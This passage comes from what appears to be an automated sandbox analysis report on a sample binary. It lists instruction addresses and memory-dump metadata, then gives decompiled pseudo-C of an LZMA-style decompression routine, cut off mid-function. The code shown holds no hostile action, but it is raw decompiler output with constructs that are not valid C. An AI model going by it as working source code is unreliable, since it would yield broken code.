                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x00000000
                  0x004066b5
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00000000
                  0x00406828
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x00000000
                  0x0040667d
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                  • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                  • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                  • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405E9D Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
